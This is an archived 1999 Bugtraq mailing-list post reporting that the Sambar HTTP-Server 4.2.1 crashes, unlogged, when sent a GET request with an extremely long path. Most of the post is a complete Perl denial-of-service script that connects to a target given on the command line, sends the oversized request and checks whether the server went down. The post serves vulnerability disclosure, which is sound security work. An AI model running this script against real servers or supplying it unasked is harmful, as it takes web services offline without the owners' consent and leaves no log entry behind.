[12098] in bugtraq
No subject found in mail header
daemon@ATHENA.MIT.EDU (Dennis Conrad)
Sun Oct 3 22:41:13 1999
Content-Type: text/plain
Content-Disposition: inline
Mime-Version: 1.0
Message-Id: <19991004005840.8813.qmail@ns1.filetron.com>
Date: Mon, 4 Oct 1999 00:58:40 -0000
Reply-To: Dennis Conrad <dennis@LINUXSTART.COM>
From: Dennis Conrad <dennis@LINUXSTART.COM>
X-To: BUGTRAQ@SECURITYFOCUS.COM
To: BUGTRAQ@SECURITYFOCUS.COM
While testing the security of the Sambar HTTP-Server I found it vulnerable
to a simple DOS attack. Sending a "GET XXXX(...a lot of Xs..)XXXX HTTP/1.0"
crashes the Server. It will die WITHOUT logging the attack.
My testing-environment:
Sambar 4.2.1
M$IE 5.0 (de)
Windows 95 C (de)
Sample exploit code follows.
Dennis Conrad (dennis@linuxstart.com)
--------------------
#!/usr/bin/perl
#########
# Sample DOS against the Sambar HTTP-Server
# This was tested against Sambar 4.2.1 running on Windows95 C
# This attack will NOT be logged! Only use it to determine if
# your Server is vulnerable!
#
# Dennis Conrad (dennis@linuxstart.com)
#
use IO::Socket;
print "+++++++++\n";
print "+ Simple DOS-attack against the Sambar HTTP-Server (tested 4.2.1)\n";
print "+ Found on the 3rd of October 1999 by dennis\@linuxstart.com\n\n";
if ($#ARGV != 0) {
die "+ Please give the host address as argument\n"
}
opensocket ("\n");
print $remote "GET " . "X" x 99999999999999999999 . " HTTP/1.0\n\n";
close $remote;
opensocket ("\n+ The server seemed to be vulnerable to this attack\n");
close $remote;
die "+ The server does not seem to be vulnerable to this attack\n";
sub opensocket {
$remote = IO::Socket::INET->new (
Proto => "tcp",
PeerAddr => $ARGV[0],
PeerPort => "http(80)",
) || die "+ Can't open http-port on $ARGV[0]$_[0]";
$remote->autoflush(1)
}
# EOF
--------------------
------
Do you do Linux? :)
Get your FREE @linuxstart.com email address at: http://www.linuxstart.com
